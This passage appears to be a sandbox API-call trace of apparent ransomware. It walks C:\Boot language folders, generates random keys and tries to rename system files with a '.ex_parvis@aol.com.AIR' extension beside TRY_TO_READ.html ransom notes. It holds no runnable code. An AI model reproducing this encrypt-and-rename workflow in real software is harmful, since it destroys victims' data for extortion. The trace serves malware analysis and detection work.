	[0051.976] CloseHandle (hObject=0x3dc) returned 1
	[0051.977] GetProcessHeap () returned 0x540000
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ae0f8 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5adff0 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56e958 | out: hHeap=0x540000) returned 1
	[0051.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a51e8 | out: hHeap=0x540000) returned 1
	[0051.977] FindFirstFileW (in: lpFileName="C:\\\\Boot\\cs-CZ\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575160
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.977] GetLastError () returned 0x0
	[0051.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5940
	[0051.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5751a0
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5751a0 | out: hHeap=0x540000) returned 1
	[0051.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5940 | out: hHeap=0x540000) returned 1
	[0051.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.977] FindNextFileW (in: hFindFile=0x575160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.978] GetLastError () returned 0x0
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5940
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5751a0
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5751a0 | out: hHeap=0x540000) returned 1
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5940 | out: hHeap=0x540000) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.978] FindNextFileW (in: hFindFile=0x575160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.978] GetLastError () returned 0x0
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5940
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5940 | out: hHeap=0x540000) returned 1
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.978] FindNextFileW (in: hFindFile=0x575160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c3e1d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.978] GetLastError () returned 0x0
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.978] FindNextFileW (in: hFindFile=0x575160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c3e1d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5aeff8
	[0051.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.979] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5aeff8 | out: pbBuffer=0x5aeff8) returned 1
	[0051.979] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596590 | out: pbBuffer=0x596590) returned 1
	[0051.979] SetFileAttributesW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.979] lstrlenW (lpString="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30
	[0051.979] GetProcessHeap () returned 0x540000
	[0051.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.979] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui"
	[0051.979] lstrcatW (in: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.979] MoveFileExW (lpExistingFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.979] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.979] GetProcessHeap () returned 0x540000
	[0051.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.979] CloseHandle (hObject=0xffffffff) returned 0
	[0051.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5210 | out: hHeap=0x540000) returned 1
	[0051.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5238 | out: hHeap=0x540000) returned 1
	[0051.979] FindFirstFileW (in: lpFileName="C:\\\\Boot\\da-DK\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5751a0
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.980] GetLastError () returned 0x6
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5210
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5751e0
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5751e0 | out: hHeap=0x540000) returned 1
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5210 | out: hHeap=0x540000) returned 1
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.980] FindNextFileW (in: hFindFile=0x5751a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.980] GetLastError () returned 0x6
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5210
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5751e0
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5751e0 | out: hHeap=0x540000) returned 1
	[0051.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5210 | out: hHeap=0x540000) returned 1
	[0051.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.981] FindNextFileW (in: hFindFile=0x5751a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.981] GetLastError () returned 0x6
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5210
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5210 | out: hHeap=0x540000) returned 1
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.981] FindNextFileW (in: hFindFile=0x5751a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c3e1d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.981] GetLastError () returned 0x6
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.981] FindNextFileW (in: hFindFile=0x5751a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c3e1d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b0108
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.981] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b0108 | out: pbBuffer=0x5b0108) returned 1
	[0051.981] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5965a0 | out: pbBuffer=0x5965a0) returned 1
	[0051.981] SetFileAttributesW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.981] lstrlenW (lpString="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned 30
	[0051.981] GetProcessHeap () returned 0x540000
	[0051.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.981] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned="C:\\\\Boot\\da-DK\\bootmgr.exe.mui"
	[0051.981] lstrcatW (in: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.982] MoveFileExW (lpExistingFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.982] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.982] GetProcessHeap () returned 0x540000
	[0051.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.982] CloseHandle (hObject=0xffffffff) returned 0
	[0051.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x540000) returned 1
	[0051.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5288 | out: hHeap=0x540000) returned 1
	[0051.982] FindFirstFileW (in: lpFileName="C:\\\\Boot\\de-DE\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5751e0
	[0051.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.982] GetLastError () returned 0x6
	[0051.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5260
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575220
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575220 | out: hHeap=0x540000) returned 1
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x540000) returned 1
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.983] FindNextFileW (in: hFindFile=0x5751e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.983] GetLastError () returned 0x6
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5260
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575220
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575220 | out: hHeap=0x540000) returned 1
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x540000) returned 1
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
